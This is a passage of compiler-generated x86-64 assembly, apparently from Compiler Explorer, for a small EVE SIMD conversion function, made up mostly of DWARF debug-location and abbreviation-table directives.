.loc 45 130 20 prologue_end # /opt/compiler-explorer/libs/eve/trunk/include/eve/module/real/core/function/regular/simd/x86/convert_256.hpp:130:20
vpmovsxwd ymm0, xmm0
.Ltmp0:
#DEBUG_VALUE: cvt:x <- [DW_OP_LLVM_entry_value 1] $xmm0
.loc 44 14 6 # example.cpp:14:6
ret
.Ltmp1:
.Lfunc_end0:
.size _Z3cvtN3eve7logicalINS_10avx_abi_v04wideIsNS_5fixedILl8EEEEEEE, .Lfunc_end0-_Z3cvtN3eve7logicalINS_10avx_abi_v04wideIsNS_5fixedILl8EEEEEEE
.cfi_endproc
.file 46 "/opt/compiler-explorer/gcc-11.1.0/lib/gcc/x86_64-linux-gnu/11.1.0/../../../../include/c++/11.1.0" "type_traits"
.file 47 "/opt/compiler-explorer/libs/eve/trunk/include/eve/arch" "cardinals.hpp"
.file 48 "/opt/compiler-explorer/libs/eve/trunk/include/eve/arch/cpu" "base.hpp"
.file 49 "/opt/compiler-explorer/libs/eve/trunk/include/eve/arch/cpu" "wide.hpp"
.file 50 "/opt/compiler-explorer/libs/eve/trunk/include/eve/detail" "overload.hpp"
.file 51 "/opt/compiler-explorer/libs/eve/trunk/include/eve/arch/cpu" "tags.hpp"
.file 52 "/opt/compiler-explorer/libs/eve/trunk/include/eve/arch/x86" "tags.hpp"
.file 53 "/opt/compiler-explorer/libs/eve/trunk/include/eve" "as.hpp"
.file 54 "/opt/compiler-explorer/libs/eve/trunk/include/eve/module/real/core/function/regular/generic" "convert.hpp"
.file 55 "/opt/compiler-explorer/libs/eve/trunk/include/eve/arch/cpu" "logical_wide.hpp"
.file 56 "/opt/compiler-explorer/libs/eve/trunk/include/eve/traits" "as_integer.hpp"
.file 57 "/opt/compiler-explorer/libs/eve/trunk/include/eve/detail" "meta.hpp"
.file 58 "/opt/compiler-explorer/libs/eve/trunk/include/eve/arch/cpu" "logical.hpp"
.file 59 "/opt/compiler-explorer/libs/eve/trunk/include/eve/module/real/core/function/regular/simd/x86" "convert_128.hpp"
# -- End function
.section ".linker-options","e",@llvm_linker_options
.section .debug_loc,"",@progbits
.Ldebug_loc0:
.quad .Lfunc_begin0-.Lfunc_begin0
.quad .Ltmp0-.Lfunc_begin0
.short 1 # Loc expr size
.byte 97 # DW_OP_reg17
.quad .Ltmp0-.Lfunc_begin0
.quad .Lfunc_end0-.Lfunc_begin0
.short 4 # Loc expr size
.byte 243 # DW_OP_GNU_entry_value
.byte 1 # 1
.byte 97 # DW_OP_reg17
.byte 159 # DW_OP_stack_value
.quad 0
.quad 0
.section .debug_abbrev,"",@progbits
.byte 1 # Abbreviation Code
.byte 17 # DW_TAG_compile_unit
.byte 1 # DW_CHILDREN_yes
.byte 37 # DW_AT_producer
.byte 14 # DW_FORM_strp
.byte 19 # DW_AT_language
.byte 5 # DW_FORM_data2
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 16 # DW_AT_stmt_list
.byte 23 # DW_FORM_sec_offset
.byte 27 # DW_AT_comp_dir
.byte 14 # DW_FORM_strp
.byte 17 # DW_AT_low_pc
.byte 1 # DW_FORM_addr
.byte 18 # DW_AT_high_pc
.byte 6 # DW_FORM_data4
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 2 # Abbreviation Code
.byte 57 # DW_TAG_namespace
.byte 1 # DW_CHILDREN_yes
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 3 # Abbreviation Code
.byte 52 # DW_TAG_variable
.byte 0 # DW_CHILDREN_no
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 63 # DW_AT_external
.byte 25 # DW_FORM_flag_present
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 110 # DW_AT_linkage_name
.byte 14 # DW_FORM_strp
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 4 # Abbreviation Code
.byte 19 # DW_TAG_structure_type
.byte 1 # DW_CHILDREN_yes
.byte 54 # DW_AT_calling_convention
.byte 11 # DW_FORM_data1
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 11 # DW_AT_byte_size
.byte 11 # DW_FORM_data1
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 5 # Abbreviation Code
.byte 47 # DW_TAG_template_type_parameter
.byte 0 # DW_CHILDREN_no
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 6 # Abbreviation Code
.byte 47 # DW_TAG_template_type_parameter
.byte 0 # DW_CHILDREN_no
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 7 # Abbreviation Code
.byte 46 # DW_TAG_subprogram
.byte 1 # DW_CHILDREN_yes
.byte 110 # DW_AT_linkage_name
.byte 14 # DW_FORM_strp
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 60 # DW_AT_declaration
.byte 25 # DW_FORM_flag_present
.byte 63 # DW_AT_external
.byte 25 # DW_FORM_flag_present
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 8 # Abbreviation Code
.ascii "\207\202\001" # DW_TAG_GNU_template_parameter_pack
.byte 1 # DW_CHILDREN_yes
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 9 # Abbreviation Code
.byte 47 # DW_TAG_template_type_parameter
.byte 0 # DW_CHILDREN_no
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 10 # Abbreviation Code
.byte 5 # DW_TAG_formal_parameter
.byte 0 # DW_CHILDREN_no
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 11 # Abbreviation Code
.byte 5 # DW_TAG_formal_parameter
.byte 0 # DW_CHILDREN_no
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 52 # DW_AT_artificial
.byte 25 # DW_FORM_flag_present
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 12 # Abbreviation Code
.byte 4 # DW_TAG_enumeration_type
.byte 1 # DW_CHILDREN_yes
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 109 # DW_AT_enum_class
.byte 25 # DW_FORM_flag_present
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 11 # DW_AT_byte_size
.byte 11 # DW_FORM_data1
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 13 # Abbreviation Code
.byte 40 # DW_TAG_enumerator
.byte 0 # DW_CHILDREN_no
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 28 # DW_AT_const_value
.byte 15 # DW_FORM_udata
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 14 # Abbreviation Code
.byte 46 # DW_TAG_subprogram
.byte 1 # DW_CHILDREN_yes
.byte 110 # DW_AT_linkage_name
.byte 14 # DW_FORM_strp
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 63 # DW_AT_external
.byte 25 # DW_FORM_flag_present
.byte 32 # DW_AT_inline
.byte 11 # DW_FORM_data1
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 15 # Abbreviation Code
.byte 5 # DW_TAG_formal_parameter
.byte 0 # DW_CHILDREN_no
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 16 # Abbreviation Code
.byte 5 # DW_TAG_formal_parameter
.byte 0 # DW_CHILDREN_no
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 17 # Abbreviation Code
.byte 46 # DW_TAG_subprogram
.byte 0 # DW_CHILDREN_no
.byte 110 # DW_AT_linkage_name
.byte 14 # DW_FORM_strp
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 60 # DW_AT_declaration
.byte 25 # DW_FORM_flag_present
.byte 63 # DW_AT_external
.byte 25 # DW_FORM_flag_present
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 18 # Abbreviation Code
.byte 13 # DW_TAG_member
.byte 0 # DW_CHILDREN_no
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 56 # DW_AT_data_member_location
.byte 11 # DW_FORM_data1
.byte 50 # DW_AT_accessibility
.byte 11 # DW_FORM_data1
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 19 # Abbreviation Code
.byte 46 # DW_TAG_subprogram
.byte 1 # DW_CHILDREN_yes
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 60 # DW_AT_declaration
.byte 25 # DW_FORM_flag_present
.byte 63 # DW_AT_external
.byte 25 # DW_FORM_flag_present
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 20 # Abbreviation Code
.byte 22 # DW_TAG_typedef
.byte 0 # DW_CHILDREN_no
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 21 # Abbreviation Code
.byte 46 # DW_TAG_subprogram
.byte 1 # DW_CHILDREN_yes
.byte 110 # DW_AT_linkage_name
.byte 14 # DW_FORM_strp
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 60 # DW_AT_declaration
.byte 25 # DW_FORM_flag_present
.byte 63 # DW_AT_external
.byte 25 # DW_FORM_flag_present
.byte 119 # DW_AT_reference
.byte 25 # DW_FORM_flag_present
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 22 # Abbreviation Code
.byte 46 # DW_TAG_subprogram
.byte 1 # DW_CHILDREN_yes
.byte 110 # DW_AT_linkage_name
.byte 14 # DW_FORM_strp
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 60 # DW_AT_declaration
.byte 25 # DW_FORM_flag_present
.byte 63 # DW_AT_external
.byte 25 # DW_FORM_flag_present
.byte 120 # DW_AT_rvalue_reference
.byte 25 # DW_FORM_flag_present
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 23 # Abbreviation Code
.byte 19 # DW_TAG_structure_type
.byte 0 # DW_CHILDREN_no
.byte 54 # DW_AT_calling_convention
.byte 11 # DW_FORM_data1
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 11 # DW_AT_byte_size
.byte 11 # DW_FORM_data1
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 24 # Abbreviation Code
.byte 48 # DW_TAG_template_value_parameter
.byte 0 # DW_CHILDREN_no
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 28 # DW_AT_const_value
.byte 15 # DW_FORM_udata
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 25 # Abbreviation Code
.byte 46 # DW_TAG_subprogram
.byte 1 # DW_CHILDREN_yes
.byte 110 # DW_AT_linkage_name
.byte 14 # DW_FORM_strp
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 5 # DW_FORM_data2
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 63 # DW_AT_external
.byte 25 # DW_FORM_flag_present
.byte 32 # DW_AT_inline
.byte 11 # DW_FORM_data1
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 26 # Abbreviation Code
.byte 5 # DW_TAG_formal_parameter
.byte 0 # DW_CHILDREN_no
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 5 # DW_FORM_data2
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 27 # Abbreviation Code
.byte 5 # DW_TAG_formal_parameter
.byte 0 # DW_CHILDREN_no
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 5 # DW_FORM_data2
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 28 # Abbreviation Code
.byte 52 # DW_TAG_variable
.byte 0 # DW_CHILDREN_no
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 5 # DW_FORM_data2
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 29 # Abbreviation Code
.byte 48 # DW_TAG_template_value_parameter
.byte 0 # DW_CHILDREN_no
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 28 # DW_AT_const_value
.byte 13 # DW_FORM_sdata
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 30 # Abbreviation Code
.byte 28 # DW_TAG_inheritance
.byte 0 # DW_CHILDREN_no
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 56 # DW_AT_data_member_location
.byte 11 # DW_FORM_data1
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 31 # Abbreviation Code
.byte 57 # DW_TAG_namespace
.byte 1 # DW_CHILDREN_yes
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.ascii "\211\001" # DW_AT_export_symbols
.byte 25 # DW_FORM_flag_present
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 32 # Abbreviation Code
.byte 46 # DW_TAG_subprogram
.byte 1 # DW_CHILDREN_yes
.byte 110 # DW_AT_linkage_name
.byte 14 # DW_FORM_strp
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 5 # DW_FORM_data2
.byte 60 # DW_AT_declaration
.byte 25 # DW_FORM_flag_present
.byte 63 # DW_AT_external
.byte 25 # DW_FORM_flag_present
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 33 # Abbreviation Code
.byte 46 # DW_TAG_subprogram
.byte 1 # DW_CHILDREN_yes
.byte 110 # DW_AT_linkage_name
.byte 14 # DW_FORM_strp
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 5 # DW_FORM_data2
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 60 # DW_AT_declaration
.byte 25 # DW_FORM_flag_present
.byte 63 # DW_AT_external
.byte 25 # DW_FORM_flag_present
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 34 # Abbreviation Code
.byte 13 # DW_TAG_member
.byte 0 # DW_CHILDREN_no
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 63 # DW_AT_external
.byte 25 # DW_FORM_flag_present
.byte 60 # DW_AT_declaration
.byte 25 # DW_FORM_flag_present
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 35 # Abbreviation Code
.byte 46 # DW_TAG_subprogram
.byte 1 # DW_CHILDREN_yes
.byte 110 # DW_AT_linkage_name
.byte 14 # DW_FORM_strp
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 60 # DW_AT_declaration
.byte 25 # DW_FORM_flag_present
.byte 63 # DW_AT_external
.byte 25 # DW_FORM_flag_present
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 36 # Abbreviation Code
.byte 19 # DW_TAG_structure_type
.byte 0 # DW_CHILDREN_no
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 60 # DW_AT_declaration
.byte 25 # DW_FORM_flag_present
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 37 # Abbreviation Code
.byte 38 # DW_TAG_const_type
.byte 0 # DW_CHILDREN_no
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 38 # Abbreviation Code
.byte 36 # DW_TAG_base_type
.byte 0 # DW_CHILDREN_no
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 62 # DW_AT_encoding
.byte 11 # DW_FORM_data1
.byte 11 # DW_AT_byte_size
.byte 11 # DW_FORM_data1
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 39 # Abbreviation Code
.byte 15 # DW_TAG_pointer_type
.byte 0 # DW_CHILDREN_no
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 40 # Abbreviation Code
.byte 1 # DW_TAG_array_type
.byte 1 # DW_CHILDREN_yes
.ascii "\207B" # DW_AT_GNU_vector
.byte 25 # DW_FORM_flag_present
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 41 # Abbreviation Code
.byte 33 # DW_TAG_subrange_type
.byte 0 # DW_CHILDREN_no
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 55 # DW_AT_count
.byte 11 # DW_FORM_data1
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 42 # Abbreviation Code
.byte 36 # DW_TAG_base_type
.byte 0 # DW_CHILDREN_no
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 11 # DW_AT_byte_size
.byte 11 # DW_FORM_data1
.byte 62 # DW_AT_encoding
.byte 11 # DW_FORM_data1
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 43 # Abbreviation Code
.byte 8 # DW_TAG_imported_declaration
.byte 0 # DW_CHILDREN_no
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 24 # DW_AT_import
.byte 19 # DW_FORM_ref4
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 44 # Abbreviation Code
.byte 8 # DW_TAG_imported_declaration
.byte 0 # DW_CHILDREN_no
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 5 # DW_FORM_data2
.byte 24 # DW_AT_import
.byte 19 # DW_FORM_ref4
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 45 # Abbreviation Code
.byte 2 # DW_TAG_class_type
.byte 1 # DW_CHILDREN_yes
.byte 54 # DW_AT_calling_convention
.byte 11 # DW_FORM_data1
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 11 # DW_AT_byte_size
.byte 11 # DW_FORM_data1
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 46 # Abbreviation Code
.byte 13 # DW_TAG_member
.byte 0 # DW_CHILDREN_no
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 56 # DW_AT_data_member_location
.byte 11 # DW_FORM_data1
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 47 # Abbreviation Code
.byte 46 # DW_TAG_subprogram
.byte 1 # DW_CHILDREN_yes
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 60 # DW_AT_declaration
.byte 25 # DW_FORM_flag_present
.byte 63 # DW_AT_external
.byte 25 # DW_FORM_flag_present
.byte 99 # DW_AT_explicit
.byte 25 # DW_FORM_flag_present
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 48 # Abbreviation Code
.byte 46 # DW_TAG_subprogram
.byte 1 # DW_CHILDREN_yes
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 60 # DW_AT_declaration
.byte 25 # DW_FORM_flag_present
.byte 63 # DW_AT_external
.byte 25 # DW_FORM_flag_present
.byte 50 # DW_AT_accessibility
.byte 11 # DW_FORM_data1
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 49 # Abbreviation Code
.byte 46 # DW_TAG_subprogram
.byte 1 # DW_CHILDREN_yes
.byte 110 # DW_AT_linkage_name
.byte 14 # DW_FORM_strp
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 60 # DW_AT_declaration
.byte 25 # DW_FORM_flag_present
.byte 63 # DW_AT_external
.byte 25 # DW_FORM_flag_present
.byte 50 # DW_AT_accessibility
.byte 11 # DW_FORM_data1
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 50 # Abbreviation Code
.byte 46 # DW_TAG_subprogram
.byte 1 # DW_CHILDREN_yes
.byte 110 # DW_AT_linkage_name
.byte 14 # DW_FORM_strp
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 60 # DW_AT_declaration
.byte 25 # DW_FORM_flag_present
.byte 63 # DW_AT_external
.byte 25 # DW_FORM_flag_present
.byte 50 # DW_AT_accessibility
.byte 11 # DW_FORM_data1
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 51 # Abbreviation Code
.byte 46 # DW_TAG_subprogram
.byte 1 # DW_CHILDREN_yes
.byte 110 # DW_AT_linkage_name
.byte 14 # DW_FORM_strp
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 60 # DW_AT_declaration
.byte 25 # DW_FORM_flag_present
.byte 63 # DW_AT_external
.byte 25 # DW_FORM_flag_present
.byte 50 # DW_AT_accessibility
.byte 11 # DW_FORM_data1
.byte 99 # DW_AT_explicit
.byte 25 # DW_FORM_flag_present
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 52 # Abbreviation Code
.byte 22 # DW_TAG_typedef
.byte 0 # DW_CHILDREN_no
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 5 # DW_FORM_data2
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 53 # Abbreviation Code
.byte 2 # DW_TAG_class_type
.byte 0 # DW_CHILDREN_no
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 60 # DW_AT_declaration
.byte 25 # DW_FORM_flag_present
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 54 # Abbreviation Code
.byte 46 # DW_TAG_subprogram
.byte 1 # DW_CHILDREN_yes
.byte 110 # DW_AT_linkage_name
.byte 14 # DW_FORM_strp
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 60 # DW_AT_declaration
.byte 25 # DW_FORM_flag_present
.byte 63 # DW_AT_external
.byte 25 # DW_FORM_flag_present
.ascii "\207\001" # DW_AT_noreturn
.byte 25 # DW_FORM_flag_present
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 55 # Abbreviation Code
.byte 57 # DW_TAG_namespace
.byte 0 # DW_CHILDREN_no
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 56 # Abbreviation Code
.byte 13 # DW_TAG_member
.byte 0 # DW_CHILDREN_no
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 63 # DW_AT_external
.byte 25 # DW_FORM_flag_present
.byte 60 # DW_AT_declaration
.byte 25 # DW_FORM_flag_present
.byte 28 # DW_AT_const_value
.byte 13 # DW_FORM_sdata
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 57 # Abbreviation Code
.byte 19 # DW_TAG_structure_type
.byte 1 # DW_CHILDREN_yes
.byte 54 # DW_AT_calling_convention
.byte 11 # DW_FORM_data1
.byte 11 # DW_AT_byte_size
.byte 11 # DW_FORM_data1
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 58 # Abbreviation Code
.byte 23 # DW_TAG_union_type
.byte 1 # DW_CHILDREN_yes
.byte 54 # DW_AT_calling_convention
.byte 11 # DW_FORM_data1
.byte 11 # DW_AT_byte_size
.byte 11 # DW_FORM_data1
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 11 # DW_FORM_data1
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 59 # Abbreviation Code
.byte 1 # DW_TAG_array_type
.byte 1 # DW_CHILDREN_yes
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 0 # EOM(1)
.byte 0 # EOM(2)
.byte 60 # Abbreviation Code
.byte 46 # DW_TAG_subprogram
.byte 1 # DW_CHILDREN_yes
.byte 3 # DW_AT_name
.byte 14 # DW_FORM_strp
.byte 58 # DW_AT_decl_file
.byte 11 # DW_FORM_data1
.byte 59 # DW_AT_decl_line
.byte 5 # DW_FORM_data2
.byte 73 # DW_AT_type
.byte 19 # DW_FORM_ref4
.byte 60 # DW_AT_declaration
.byte 25 # DW_FORM_flag_present
.byte 63 # DW_AT_external
.byte 25 # DW_FORM_flag_present
.byte 0 # EOM(1)
.byte 0 # EOM(2)
